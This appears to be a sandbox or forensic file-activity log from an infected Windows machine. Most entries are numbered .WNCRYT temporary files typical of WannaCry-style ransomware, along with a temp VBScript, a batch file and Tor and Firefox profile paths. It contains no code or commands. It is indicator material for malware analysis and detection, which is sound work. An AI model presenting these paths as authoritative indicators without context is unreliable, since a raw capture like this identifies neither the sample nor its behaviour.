file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt
file: C:\ba69bdf0a250e352360c33\netfx_Full.mzz
file: C:\Users\user\AppData\Local\Temp\m.vbs
file: C:\Users\user\AppData\Local\Temp\275781765172918.bat
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
file: C:\Users\user\AppData\Roaming\tor\key-pinning-entries
file: C:\Users\user\AppData\Local\Temp\0.WNCRYT
file: C:\Users\user\AppData\Local\Temp\1.WNCRYT
file: C:\Users\user\AppData\Local\Temp\10.WNCRYT
file: C:\Users\user\AppData\Local\Temp\100.WNCRYT
file: C:\Users\user\AppData\Local\Temp\101.WNCRYT
file: C:\Users\user\AppData\Local\Temp\102.WNCRYT
file: C:\Users\user\AppData\Local\Temp\103.WNCRYT
file: C:\Users\user\AppData\Local\Temp\104.WNCRYT
file: C:\Users\user\AppData\Local\Temp\105.WNCRYT
file: C:\Users\user\AppData\Local\Temp\106.WNCRYT
file: C:\Users\user\AppData\Local\Temp\107.WNCRYT
file: C:\Users\user\AppData\Local\Temp\108.WNCRYT
file: C:\Users\user\AppData\Local\Temp\109.WNCRYT
file: C:\Users\user\AppData\Local\Temp\11.WNCRYT
file: C:\Users\user\AppData\Local\Temp\110.WNCRYT
file: C:\Users\user\AppData\Local\Temp\111.WNCRYT
file: C:\Users\user\AppData\Local\Temp\112.WNCRYT
file: C:\Users\user\AppData\Local\Temp\113.WNCRYT
file: C:\Users\user\AppData\Local\Temp\114.WNCRYT
file: C:\Users\user\AppData\Local\Temp\115.WNCRYT
file: C:\Users\user\AppData\Local\Temp\116.WNCRYT
file: C:\Users\user\AppData\Local\Temp\117.WNCRYT
file: C:\Users\user\AppData\Local\Temp\118.WNCRYT
file: C:\Users\user\AppData\Local\Temp\119.WNCRYT
file: C:\Users\user\AppData\Local\Temp\12.WNCRYT
file: C:\Users\user\AppData\Local\Temp\120.WNCRYT
file: C:\Users\user\AppData\Local\Temp\121.WNCRYT
file: C:\Users\user\AppData\Local\Temp\122.WNCRYT
file: C:\Users\user\AppData\Local\Temp\123.WNCRYT
file: C:\Users\user\AppData\Local\Temp\124.WNCRYT
file: C:\Users\user\AppData\Local\Temp\125.WNCRYT
file: C:\Users\user\AppData\Local\Temp\126.WNCRYT
file: C:\Users\user\AppData\Local\Temp\127.WNCRYT
file: C:\Users\user\AppData\Local\Temp\128.WNCRYT
file: C:\Users\user\AppData\Local\Temp\129.WNCRYT
file: C:\Users\user\AppData\Local\Temp\13.WNCRYT
file: C:\Users\user\AppData\Local\Temp\130.WNCRYT
file: C:\Users\user\AppData\Local\Temp\131.WNCRYT
file: C:\Users\user\AppData\Local\Temp\132.WNCRYT
file: C:\Users\user\AppData\Local\Temp\133.WNCRYT
file: C:\Users\user\AppData\Local\Temp\134.WNCRYT
file: C:\Users\user\AppData\Local\Temp\135.WNCRYT
file: C:\Users\user\AppData\Local\Temp\136.WNCRYT
file: C:\Users\user\AppData\Local\Temp\137.WNCRYT
file: C:\Users\user\AppData\Local\Temp\138.WNCRYT
file: C:\Users\user\AppData\Local\Temp\139.WNCRYT
file: C:\Users\user\AppData\Local\Temp\14.WNCRYT
file: C:\Users\user\AppData\Local\Temp\140.WNCRYT
file: C:\Users\user\AppData\Local\Temp\141.WNCRYT
file: C:\Users\user\AppData\Local\Temp\142.WNCRYT
file: C:\Users\user\AppData\Local\Temp\143.WNCRYT
file: C:\Users\user\AppData\Local\Temp\144.WNCRYT
file: C:\Users\user\AppData\Local\Temp\145.WNCRYT
file: C:\Users\user\AppData\Local\Temp\146.WNCRYT
file: C:\Users\user\AppData\Local\Temp\147.WNCRYT
file: C:\Users\user\AppData\Local\Temp\148.WNCRYT
file: C:\Users\user\AppData\Local\Temp\149.WNCRYT
file: C:\Users\user\AppData\Local\Temp\15.WNCRYT
file: C:\Users\user\AppData\Local\Temp\150.WNCRYT
file: C:\Users\user\AppData\Local\Temp\151.WNCRYT
file: C:\Users\user\AppData\Local\Temp\152.WNCRYT
file: C:\Users\user\AppData\Local\Temp\153.WNCRYT
file: C:\Users\user\AppData\Local\Temp\154.WNCRYT
file: C:\Users\user\AppData\Local\Temp\155.WNCRYT
file: C:\Users\user\AppData\Local\Temp\156.WNCRYT
file: C:\Users\user\AppData\Local\Temp\157.WNCRYT
file: C:\Users\user\AppData\Local\Temp\158.WNCRYT
file: C:\Users\user\AppData\Local\Temp\159.WNCRYT
file: C:\Users\user\AppData\Local\Temp\16.WNCRYT
file: C:\Users\user\AppData\Local\Temp\160.WNCRYT
file: C:\Users\user\AppData\Local\Temp\161.WNCRYT
file: C:\Users\user\AppData\Local\Temp\162.WNCRYT
file: C:\Users\user\AppData\Local\Temp\163.WNCRYT
file: C:\Users\user\AppData\Local\Temp\164.WNCRYT
file: C:\Users\user\AppData\Local\Temp\165.WNCRYT
file: C:\Users\user\AppData\Local\Temp\166.WNCRYT
file: C:\Users\user\AppData\Local\Temp\167.WNCRYT
file: C:\Users\user\AppData\Local\Temp\168.WNCRYT
file: C:\Users\user\AppData\Local\Temp\169.WNCRYT
file: C:\Users\user\AppData\Local\Temp\17.WNCRYT
file: C:\Users\user\AppData\Local\Temp\170.WNCRYT
file: C:\Users\user\AppData\Local\Temp\171.WNCRYT
file: C:\Users\user\AppData\Local\Temp\172.WNCRYT
file: C:\Users\user\AppData\Local\Temp\173.WNCRYT
file: C:\Users\user\AppData\Local\Temp\174.WNCRYT
file: C:\Users\user\AppData\Local\Temp\175.WNCRYT
file: C:\Users\user\AppData\Local\Temp\176.WNCRYT
file: C:\Users\user\AppData\Local\Temp\177.WNCRYT
file: C:\Users\user\AppData\Local\Temp\178.WNCRYT
file: C:\Users\user\AppData\Local\Temp\179.WNCRYT
file: C:\Users\user\AppData\Local\Temp\18.WNCRYT
file: C:\Users\user\AppData\Local\Temp\180.WNCRYT
file: C:\Users\user\AppData\Local\Temp\181.WNCRYT
file: C:\Users\user\AppData\Local\Temp\182.WNCRYT
file: C:\Users\user\AppData\Local\Temp\183.WNCRYT
file: C:\Users\user\AppData\Local\Temp\184.WNCRYT
file: C:\Users\user\AppData\Local\Temp\185.WNCRYT
file: C:\Users\user\AppData\Local\Temp\186.WNCRYT
file: C:\Users\user\AppData\Local\Temp\187.WNCRYT
file: C:\Users\user\AppData\Local\Temp\188.WNCRYT
file: C:\Users\user\AppData\Local\Temp\189.WNCRYT
file: C:\Users\user\AppData\Local\Temp\19.WNCRYT
file: C:\Users\user\AppData\Local\Temp\190.WNCRYT
file: C:\Users\user\AppData\Local\Temp\191.WNCRYT
file: C:\Users\user\AppData\Local\Temp\192.WNCRYT
file: C:\Users\user\AppData\Local\Temp\193.WNCRYT
file: C:\Users\user\AppData\Local\Temp\194.WNCRYT
file: C:\Users\user\AppData\Local\Temp\195.WNCRYT
file: C:\Users\user\AppData\Local\Temp\196.WNCRYT
file: C:\Users\user\AppData\Local\Temp\197.WNCRYT
file: C:\Users\user\AppData\Local\Temp\198.WNCRYT
file: C:\Users\user\AppData\Local\Temp\199.WNCRYT
file: C:\Users\user\AppData\Local\Temp\2.WNCRYT
file: C:\Users\user\AppData\Local\Temp\20.WNCRYT
file: C:\Users\user\AppData\Local\Temp\200.WNCRYT
file: C:\Users\user\AppData\Local\Temp\201.WNCRYT
file: C:\Users\user\AppData\Local\Temp\202.WNCRYT
file: C:\Users\user\AppData\Local\Temp\203.WNCRYT
file: C:\Users\user\AppData\Local\Temp\204.WNCRYT
file: C:\Users\user\AppData\Local\Temp\205.WNCRYT
file: C:\Users\user\AppData\Local\Temp\206.WNCRYT
file: C:\Users\user\AppData\Local\Temp\207.WNCRYT
file: C:\Users\user\AppData\Local\Temp\208.WNCRYT
file: C:\Users\user\AppData\Local\Temp\209.WNCRYT
file: C:\Users\user\AppData\Local\Temp\21.WNCRYT
file: C:\Users\user\AppData\Local\Temp\210.WNCRYT
file: C:\Users\user\AppData\Local\Temp\211.WNCRYT
file: C:\Users\user\AppData\Local\Temp\212.WNCRYT
file: C:\Users\user\AppData\Local\Temp\213.WNCRYT
file: C:\Users\user\AppData\Local\Temp\214.WNCRYT
file: C:\Users\user\AppData\Local\Temp\215.WNCRYT
file: C:\Users\user\AppData\Local\Temp\216.WNCRYT
file: C:\Users\user\AppData\Local\Temp\217.WNCRYT
file: C:\Users\user\AppData\Local\Temp\218.WNCRYT
file: C:\Users\user\AppData\Local\Temp\219.WNCRYT
file: C:\Users\user\AppData\Local\Temp\22.WNCRYT
file: C:\Users\user\AppData\Local\Temp\220.WNCRYT
file: C:\Users\user\AppData\Local\Temp\221.WNCRYT
file: C:\Users\user\AppData\Local\Temp\222.WNCRYT
file: C:\Users\user\AppData\Local\Temp\223.WNCRYT
file: C:\Users\user\AppData\Local\Temp\224.WNCRYT
file: C:\Users\user\AppData\Local\Temp\225.WNCRYT
file: C:\Users\user\AppData\Local\Temp\226.WNCRYT
file: C:\Users\user\AppData\Local\Temp\227.WNCRYT
file: C:\Users\user\AppData\Local\Temp\228.WNCRYT
file: C:\Users\user\AppData\Local\Temp\229.WNCRYT
file: C:\Users\user\AppData\Local\Temp\23.WNCRYT
file: C:\Users\user\AppData\Local\Temp\230.WNCRYT
file: C:\Users\user\AppData\Local\Temp\231.WNCRYT
file: C:\Users\user\AppData\Local\Temp\232.WNCRYT
file: C:\Users\user\AppData\Local\Temp\233.WNCRYT
file: C:\Users\user\AppData\Local\Temp\234.WNCRYT
file: C:\Users\user\AppData\Local\Temp\235.WNCRYT
file: C:\Users\user\AppData\Local\Temp\236.WNCRYT
file: C:\Users\user\AppData\Local\Temp\237.WNCRYT
file: C:\Users\user\AppData\Local\Temp\238.WNCRYT
file: C:\Users\user\AppData\Local\Temp\239.WNCRYT
file: C:\Users\user\AppData\Local\Temp\24.WNCRYT
file: C:\Users\user\AppData\Local\Temp\240.WNCRYT
file: C:\Users\user\AppData\Local\Temp\241.WNCRYT
file: C:\Users\user\AppData\Local\Temp\242.WNCRYT
file: C:\Users\user\AppData\Local\Temp\243.WNCRYT
file: C:\Users\user\AppData\Local\Temp\244.WNCRYT
file: C:\Users\user\AppData\Local\Temp\245.WNCRYT
file: C:\Users\user\AppData\Local\Temp\246.WNCRYT
file: C:\Users\user\AppData\Local\Temp\247.WNCRYT
file: C:\Users\user\AppData\Local\Temp\248.WNCRYT
file: C:\Users\user\AppData\Local\Temp\249.WNCRYT
file: C:\Users\user\AppData\Local\Temp\25.WNCRYT
file: C:\Users\user\AppData\Local\Temp\250.WNCRYT
file: C:\Users\user\AppData\Local\Temp\251.WNCRYT
file: C:\Users\user\AppData\Local\Temp\252.WNCRYT
file: C:\Users\user\AppData\Local\Temp\253.WNCRYT
file: C:\Users\user\AppData\Local\Temp\254.WNCRYT
file: C:\Users\user\AppData\Local\Temp\255.WNCRYT
file: C:\Users\user\AppData\Local\Temp\256.WNCRYT
file: C:\Users\user\AppData\Local\Temp\257.WNCRYT
file: C:\Users\user\AppData\Local\Temp\258.WNCRYT
file: C:\Users\user\AppData\Local\Temp\259.WNCRYT
file: C:\Users\user\AppData\Local\Temp\26.WNCRYT
file: C:\Users\user\AppData\Local\Temp\260.WNCRYT
file: C:\Users\user\AppData\Local\Temp\261.WNCRYT
file: C:\Users\user\AppData\Local\Temp\262.WNCRYT
file: C:\Users\user\AppData\Local\Temp\263.WNCRYT
file: C:\Users\user\AppData\Local\Temp\264.WNCRYT
file: C:\Users\user\AppData\Local\Temp\265.WNCRYT
file: C:\Users\user\AppData\Local\Temp\266.WNCRYT
file: C:\Users\user\AppData\Local\Temp\267.WNCRYT
file: C:\Users\user\AppData\Local\Temp\268.WNCRYT
file: C:\Users\user\AppData\Local\Temp\269.WNCRYT
file: C:\Users\user\AppData\Local\Temp\27.WNCRYT
file: C:\Users\user\AppData\Local\Temp\270.WNCRYT
file: C:\Users\user\AppData\Local\Temp\271.WNCRYT
file: C:\Users\user\AppData\Local\Temp\272.WNCRYT
file: C:\Users\user\AppData\Local\Temp\273.WNCRYT
file: C:\Users\user\AppData\Local\Temp\274.WNCRYT
file: C:\Users\user\AppData\Local\Temp\275.WNCRYT
file: C:\Users\user\AppData\Local\Temp\276.WNCRYT
file: C:\Users\user\AppData\Local\Temp\277.WNCRYT
file: C:\Users\user\AppData\Local\Temp\278.WNCRYT
file: C:\Users\user\AppData\Local\Temp\279.WNCRYT
file: C:\Users\user\AppData\Local\Temp\28.WNCRYT
file: C:\Users\user\AppData\Local\Temp\280.WNCRYT
file: C:\Users\user\AppData\Local\Temp\281.WNCRYT
file: C:\Users\user\AppData\Local\Temp\282.WNCRYT
file: C:\Users\user\AppData\Local\Temp\283.WNCRYT
file: C:\Users\user\AppData\Local\Temp\284.WNCRYT
file: C:\Users\user\AppData\Local\Temp\285.WNCRYT
file: C:\Users\user\AppData\Local\Temp\286.WNCRYT
file: C:\Users\user\AppData\Local\Temp\287.WNCRYT
file: C:\Users\user\AppData\Local\Temp\288.WNCRYT
file: C:\Users\user\AppData\Local\Temp\289.WNCRYT
file: C:\Users\user\AppData\Local\Temp\29.WNCRYT
file: C:\Users\user\AppData\Local\Temp\290.WNCRYT
file: C:\Users\user\AppData\Local\Temp\291.WNCRYT
file: C:\Users\user\AppData\Local\Temp\292.WNCRYT
file: C:\Users\user\AppData\Local\Temp\293.WNCRYT
file: C:\Users\user\AppData\Local\Temp\294.WNCRYT
file: C:\Users\user\AppData\Local\Temp\295.WNCRYT
file: C:\Users\user\AppData\Local\Temp\296.WNCRYT
file: C:\Users\user\AppData\Local\Temp\297.WNCRYT
file: C:\Users\user\AppData\Local\Temp\298.WNCRYT
file: C:\Users\user\AppData\Local\Temp\299.WNCRYT
file: C:\Users\user\AppData\Local\Temp\3.WNCRYT
file: C:\Users\user\AppData\Local\Temp\30.WNCRYT
file: C:\Users\user\AppData\Local\Temp\300.WNCRYT
file: C:\Users\user\AppData\Local\Temp\301.WNCRYT
file: C:\Users\user\AppData\Local\Temp\302.WNCRYT
file: C:\Users\user\AppData\Local\Temp\303.WNCRYT
file: C:\Users\user\AppData\Local\Temp\304.WNCRYT
file: C:\Users\user\AppData\Local\Temp\305.WNCRYT
file: C:\Users\user\AppData\Local\Temp\306.WNCRYT
file: C:\Users\user\AppData\Local\Temp\307.WNCRYT
file: C:\Users\user\AppData\Local\Temp\308.WNCRYT
file: C:\Users\user\AppData\Local\Temp\309.WNCRYT
file: C:\Users\user\AppData\Local\Temp\31.WNCRYT
file: C:\Users\user\AppData\Local\Temp\310.WNCRYT
file: C:\Users\user\AppData\Local\Temp\311.WNCRYT
file: C:\Users\user\AppData\Local\Temp\312.WNCRYT
file: C:\Users\user\AppData\Local\Temp\313.WNCRYT
file: C:\Users\user\AppData\Local\Temp\314.WNCRYT
file: C:\Users\user\AppData\Local\Temp\315.WNCRYT
file: C:\Users\user\AppData\Local\Temp\316.WNCRYT
file: C:\Users\user\AppData\Local\Temp\317.WNCRYT
file: C:\Users\user\AppData\Local\Temp\318.WNCRYT
file: C:\Users\user\AppData\Local\Temp\319.WNCRYT
file: C:\Users\user\AppData\Local\Temp\32.WNCRYT
file: C:\Users\user\AppData\Local\Temp\320.WNCRYT
file: C:\Users\user\AppData\Local\Temp\321.WNCRYT
file: C:\Users\user\AppData\Local\Temp\322.WNCRYT
file: C:\Users\user\AppData\Local\Temp\323.WNCRYT
file: C:\Users\user\AppData\Local\Temp\324.WNCRYT
file: C:\Users\user\AppData\Local\Temp\325.WNCRYT
file: C:\Users\user\AppData\Local\Temp\326.WNCRYT
file: C:\Users\user\AppData\Local\Temp\327.WNCRYT
file: C:\Users\user\AppData\Local\Temp\328.WNCRYT
file: C:\Users\user\AppData\Local\Temp\329.WNCRYT
file: C:\Users\user\AppData\Local\Temp\33.WNCRYT
file: C:\Users\user\AppData\Local\Temp\330.WNCRYT
file: C:\Users\user\AppData\Local\Temp\331.WNCRYT
file: C:\Users\user\AppData\Local\Temp\332.WNCRYT
file: C:\Users\user\AppData\Local\Temp\333.WNCRYT
file: C:\Users\user\AppData\Local\Temp\334.WNCRYT
file: C:\Users\user\AppData\Local\Temp\335.WNCRYT
file: C:\Users\user\AppData\Local\Temp\336.WNCRYT
file: C:\Users\user\AppData\Local\Temp\337.WNCRYT
file: C:\Users\user\AppData\Local\Temp\338.WNCRYT
file: C:\Users\user\AppData\Local\Temp\339.WNCRYT
file: C:\Users\user\AppData\Local\Temp\34.WNCRYT
file: C:\Users\user\AppData\Local\Temp\340.WNCRYT
file: C:\Users\user\AppData\Local\Temp\341.WNCRYT
file: C:\Users\user\AppData\Local\Temp\342.WNCRYT
file: C:\Users\user\AppData\Local\Temp\343.WNCRYT
file: C:\Users\user\AppData\Local\Temp\344.WNCRYT
file: C:\Users\user\AppData\Local\Temp\345.WNCRYT
file: C:\Users\user\AppData\Local\Temp\346.WNCRYT
file: C:\Users\user\AppData\Local\Temp\347.WNCRYT
file: C:\Users\user\AppData\Local\Temp\348.WNCRYT
file: C:\Users\user\AppData\Local\Temp\349.WNCRYT
file: C:\Users\user\AppData\Local\Temp\35.WNCRYT
file: C:\Users\user\AppData\Local\Temp\350.WNCRYT
file: C:\Users\user\AppData\Local\Temp\351.WNCRYT
file: C:\Users\user\AppData\Local\Temp\352.WNCRYT
file: C:\Users\user\AppData\Local\Temp\353.WNCRYT
file: C:\Users\user\AppData\Local\Temp\36.WNCRYT
file: C:\Users\user\AppData\Local\Temp\360.WNCRYT
file: C:\Users\user\AppData\Local\Temp\361.WNCRYT
file: C:\Users\user\AppData\Local\Temp\37.WNCRYT
file: C:\Users\user\AppData\Local\Temp\38.WNCRYT
file: C:\Users\user\AppData\Local\Temp\39.WNCRYT
file: C:\Users\user\AppData\Local\Temp\397.WNCRYT
file: C:\Users\user\AppData\Local\Temp\398.WNCRYT
file: C:\Users\user\AppData\Local\Temp\399.WNCRYT
file: C:\Users\user\AppData\Local\Temp\4.WNCRYT
file: C:\Users\user\AppData\Local\Temp\40.WNCRYT
file: C:\Users\user\AppData\Local\Temp\400.WNCRYT
file: C:\Users\user\AppData\Local\Temp\401.WNCRYT
file: C:\Users\user\AppData\Local\Temp\402.WNCRYT
file: C:\Users\user\AppData\Local\Temp\403.WNCRYT
file: C:\Users\user\AppData\Local\Temp\404.WNCRYT
file: C:\Users\user\AppData\Local\Temp\405.WNCRYT
file: C:\Users\user\AppData\Local\Temp\406.WNCRYT
file: C:\Users\user\AppData\Local\Temp\407.WNCRYT
file: C:\Users\user\AppData\Local\Temp\408.WNCRYT
file: C:\Users\user\AppData\Local\Temp\409.WNCRYT
file: C:\Users\user\AppData\Local\Temp\41.WNCRYT
file: C:\Users\user\AppData\Local\Temp\410.WNCRYT
file: C:\Users\user\AppData\Local\Temp\411.WNCRYT
file: C:\Users\user\AppData\Local\Temp\412.WNCRYT
file: C:\Users\user\AppData\Local\Temp\413.WNCRYT
file: C:\Users\user\AppData\Local\Temp\414.WNCRYT
file: C:\Users\user\AppData\Local\Temp\415.WNCRYT
file: C:\Users\user\AppData\Local\Temp\416.WNCRYT
file: C:\Users\user\AppData\Local\Temp\417.WNCRYT
file: C:\Users\user\AppData\Local\Temp\418.WNCRYT
file: C:\Users\user\AppData\Local\Temp\419.WNCRYT
file: C:\Users\user\AppData\Local\Temp\42.WNCRYT
file: C:\Users\user\AppData\Local\Temp\420.WNCRYT
file: C:\Users\user\AppData\Local\Temp\422.WNCRYT
file: C:\Users\user\AppData\Local\Temp\423.WNCRYT
file: C:\Users\user\AppData\Local\Temp\424.WNCRYT
file: C:\Users\user\AppData\Local\Temp\425.WNCRYT
file: C:\Users\user\AppData\Local\Temp\426.WNCRYT
file: C:\Users\user\AppData\Local\Temp\427.WNCRYT
file: C:\Users\user\AppData\Local\Temp\428.WNCRYT
file: C:\Users\user\AppData\Local\Temp\429.WNCRYT
file: C:\Users\user\AppData\Local\Temp\43.WNCRYT
file: C:\Users\user\AppData\Local\Temp\430.WNCRYT
file: C:\Users\user\AppData\Local\Temp\431.WNCRYT
file: C:\Users\user\AppData\Local\Temp\432.WNCRYT
file: C:\Users\user\AppData\Local\Temp\433.WNCRYT
file: C:\Users\user\AppData\Local\Temp\434.WNCRYT
file: C:\Users\user\AppData\Local\Temp\435.WNCRYT
file: C:\Users\user\AppData\Local\Temp\436.WNCRYT
file: C:\Users\user\AppData\Local\Temp\437.WNCRYT
file: C:\Users\user\AppData\Local\Temp\438.WNCRYT
file: C:\Users\user\AppData\Local\Temp\439.WNCRYT
file: C:\Users\user\AppData\Local\Temp\44.WNCRYT
file: C:\Users\user\AppData\Local\Temp\440.WNCRYT
file: C:\Users\user\AppData\Local\Temp\441.WNCRYT
file: C:\Users\user\AppData\Local\Temp\442.WNCRYT
file: C:\Users\user\AppData\Local\Temp\443.WNCRYT
file: C:\Users\user\AppData\Local\Temp\444.WNCRYT
file: C:\Users\user\AppData\Local\Temp\445.WNCRYT
file: C:\Users\user\AppData\Local\Temp\446.WNCRYT
file: C:\Users\user\AppData\Local\Temp\447.WNCRYT
file: C:\Users\user\AppData\Local\Temp\448.WNCRYT
file: C:\Users\user\AppData\Local\Temp\449.WNCRYT
file: C:\Users\user\AppData\Local\Temp\45.WNCRYT
file: C:\Users\user\AppData\Local\Temp\450.WNCRYT
file: C:\Users\user\AppData\Local\Temp\451.WNCRYT
file: C:\Users\user\AppData\Local\Temp\452.WNCRYT
file: C:\Users\user\AppData\Local\Temp\453.WNCRYT
file: C:\Users\user\AppData\Local\Temp\454.WNCRYT
file: C:\Users\user\AppData\Local\Temp\455.WNCRYT
file: C:\Users\user\AppData\Local\Temp\456.WNCRYT
file: C:\Users\user\AppData\Local\Temp\457.WNCRYT
file: C:\Users\user\AppData\Local\Temp\458.WNCRYT
file: C:\Users\user\AppData\Local\Temp\459.WNCRYT
file: C:\Users\user\AppData\Local\Temp\46.WNCRYT
file: C:\Users\user\AppData\Local\Temp\460.WNCRYT
file: C:\Users\user\AppData\Local\Temp\461.WNCRYT
file: C:\Users\user\AppData\Local\Temp\462.WNCRYT
file: C:\Users\user\AppData\Local\Temp\463.WNCRYT
file: C:\Users\user\AppData\Local\Temp\464.WNCRYT
file: C:\Users\user\AppData\Local\Temp\465.WNCRYT
file: C:\Users\user\AppData\Local\Temp\466.WNCRYT
file: C:\Users\user\AppData\Local\Temp\467.WNCRYT
file: C:\Users\user\AppData\Local\Temp\468.WNCRYT
file: C:\Users\user\AppData\Local\Temp\469.WNCRYT
file: C:\Users\user\AppData\Local\Temp\47.WNCRYT
file: C:\Users\user\AppData\Local\Temp\470.WNCRYT
file: C:\Users\user\AppData\Local\Temp\471.WNCRYT
file: C:\Users\user\AppData\Local\Temp\472.WNCRYT
file: C:\Users\user\AppData\Local\Temp\473.WNCRYT
file: C:\Users\user\AppData\Local\Temp\474.WNCRYT
file: C:\Users\user\AppData\Local\Temp\475.WNCRYT
file: C:\Users\user\AppData\Local\Temp\476.WNCRYT
file: C:\Users\user\AppData\Local\Temp\477.WNCRYT
file: C:\Users\user\AppData\Local\Temp\478.WNCRYT
file: C:\Users\user\AppData\Local\Temp\479.WNCRYT
file: C:\Users\user\AppData\Local\Temp\48.WNCRYT
file: C:\Users\user\AppData\Local\Temp\480.WNCRYT
file: C:\Users\user\AppData\Local\Temp\481.WNCRYT
file: C:\Users\user\AppData\Local\Temp\482.WNCRYT
file: C:\Users\user\AppData\Local\Temp\483.WNCRYT
file: C:\Users\user\AppData\Local\Temp\484.WNCRYT
file: C:\Users\user\AppData\Local\Temp\485.WNCRYT
file: C:\Users\user\AppData\Local\Temp\486.WNCRYT
file: C:\Users\user\AppData\Local\Temp\487.WNCRYT
file: C:\Users\user\AppData\Local\Temp\488.WNCRYT
file: C:\Users\user\AppData\Local\Temp\489.WNCRYT
file: C:\Users\user\AppData\Local\Temp\49.WNCRYT
file: C:\Users\user\AppData\Local\Temp\490.WNCRYT
file: C:\Users\user\AppData\Local\Temp\491.WNCRYT
file: C:\Users\user\AppData\Local\Temp\492.WNCRYT
file: C:\Users\user\AppData\Local\Temp\493.WNCRYT
file: C:\Users\user\AppData\Local\Temp\494.WNCRYT
file: C:\Users\user\AppData\Local\Temp\495.WNCRYT
file: C:\Users\user\AppData\Local\Temp\496.WNCRYT
file: C:\Users\user\AppData\Local\Temp\497.WNCRYT
file: C:\Users\user\AppData\Local\Temp\498.WNCRYT
file: C:\Users\user\AppData\Local\Temp\499.WNCRYT
file: C:\Users\user\AppData\Local\Temp\5.WNCRYT
file: C:\Users\user\AppData\Local\Temp\50.WNCRYT
file: C:\Users\user\AppData\Local\Temp\500.WNCRYT
file: C:\Users\user\AppData\Local\Temp\501.WNCRYT
file: C:\Users\user\AppData\Local\Temp\502.WNCRYT
file: C:\Users\user\AppData\Local\Temp\503.WNCRYT
file: C:\Users\user\AppData\Local\Temp\504.WNCRYT
file: C:\Users\user\AppData\Local\Temp\505.WNCRYT
file: C:\Users\user\AppData\Local\Temp\506.WNCRYT
file: C:\Users\user\AppData\Local\Temp\507.WNCRYT
file: C:\Users\user\AppData\Local\Temp\508.WNCRYT
file: C:\Users\user\AppData\Local\Temp\509.WNCRYT
file: C:\Users\user\AppData\Local\Temp\51.WNCRYT
file: C:\Users\user\AppData\Local\Temp\510.WNCRYT
file: C:\Users\user\AppData\Local\Temp\511.WNCRYT
file: C:\Users\user\AppData\Local\Temp\512.WNCRYT
file: C:\Users\user\AppData\Local\Temp\513.WNCRYT
file: C:\Users\user\AppData\Local\Temp\514.WNCRYT
file: C:\Users\user\AppData\Local\Temp\515.WNCRYT
file: C:\Users\user\AppData\Local\Temp\516.WNCRYT
file: C:\Users\user\AppData\Local\Temp\517.WNCRYT
file: C:\Users\user\AppData\Local\Temp\518.WNCRYT
file: C:\Users\user\AppData\Local\Temp\519.WNCRYT
file: C:\Users\user\AppData\Local\Temp\52.WNCRYT
file: C:\Users\user\AppData\Local\Temp\520.WNCRYT
file: C:\Users\user\AppData\Local\Temp\521.WNCRYT
file: C:\Users\user\AppData\Local\Temp\522.WNCRYT
file: C:\Users\user\AppData\Local\Temp\523.WNCRYT
file: C:\Users\user\AppData\Local\Temp\524.WNCRYT
file: C:\Users\user\AppData\Local\Temp\525.WNCRYT
file: C:\Users\user\AppData\Local\Temp\526.WNCRYT
file: C:\Users\user\AppData\Local\Temp\527.WNCRYT
file: C:\Users\user\AppData\Local\Temp\528.WNCRYT
file: C:\Users\user\AppData\Local\Temp\529.WNCRYT
file: C:\Users\user\AppData\Local\Temp\53.WNCRYT
file: C:\Users\user\AppData\Local\Temp\530.WNCRYT
file: C:\Users\user\AppData\Local\Temp\531.WNCRYT
file: C:\Users\user\AppData\Local\Temp\532.WNCRYT
file: C:\Users\user\AppData\Local\Temp\533.WNCRYT
file: C:\Users\user\AppData\Local\Temp\534.WNCRYT
file: C:\Users\user\AppData\Local\Temp\535.WNCRYT
file: C:\Users\user\AppData\Local\Temp\536.WNCRYT
file: C:\Users\user\AppData\Local\Temp\537.WNCRYT
file: C:\Users\user\AppData\Local\Temp\538.WNCRYT
file: C:\Users\user\AppData\Local\Temp\539.WNCRYT
file: C:\Users\user\AppData\Local\Temp\540.WNCRYT
file: C:\Users\user\AppData\Local\Temp\541.WNCRYT
file: C:\Users\user\AppData\Local\Temp\542.WNCRYT
file: C:\Users\user\AppData\Local\Temp\543.WNCRYT
file: C:\Users\user\AppData\Local\Temp\55.WNCRYT
file: C:\Users\user\AppData\Local\Temp\56.WNCRYT
file: C:\Users\user\AppData\Local\Temp\57.WNCRYT
file: C:\Users\user\AppData\Local\Temp\58.WNCRYT
file: C:\Users\user\AppData\Local\Temp\59.WNCRYT
file: C:\Users\user\AppData\Local\Temp\6.WNCRYT
file: C:\Users\user\AppData\Local\Temp\60.WNCRYT
file: C:\Users\user\AppData\Local\Temp\61.WNCRYT
file: C:\Users\user\AppData\Local\Temp\62.WNCRYT
file: C:\Users\user\AppData\Local\Temp\63.WNCRYT
file: C:\Users\user\AppData\Local\Temp\64.WNCRYT
file: C:\Users\user\AppData\Local\Temp\65.WNCRYT
file: C:\Users\user\AppData\Local\Temp\66.WNCRYT
file: C:\Users\user\AppData\Local\Temp\67.WNCRYT
file: C:\Users\user\AppData\Local\Temp\68.WNCRYT
file: C:\Users\user\AppData\Local\Temp\69.WNCRYT
file: C:\Users\user\AppData\Local\Temp\7.WNCRYT
file: C:\Users\user\AppData\Local\Temp\70.WNCRYT
file: C:\Users\user\AppData\Local\Temp\71.WNCRYT
file: C:\Users\user\AppData\Local\Temp\72.WNCRYT
file: C:\Users\user\AppData\Local\Temp\73.WNCRYT
file: C:\Users\user\AppData\Local\Temp\74.WNCRYT
file: C:\Users\user\AppData\Local\Temp\75.WNCRYT
file: C:\Users\user\AppData\Local\Temp\76.WNCRYT
file: C:\Users\user\AppData\Local\Temp\77.WNCRYT
file: C:\Users\user\AppData\Local\Temp\78.WNCRYT
file: C:\Users\user\AppData\Local\Temp\79.WNCRYT
file: C:\Users\user\AppData\Local\Temp\8.WNCRYT
file: C:\Users\user\AppData\Local\Temp\80.WNCRYT
file: C:\Users\user\AppData\Local\Temp\81.WNCRYT
file: C:\Users\user\AppData\Local\Temp\82.WNCRYT
file: C:\Users\user\AppData\Local\Temp\83.WNCRYT
file: C:\Users\user\AppData\Local\Temp\84.WNCRYT
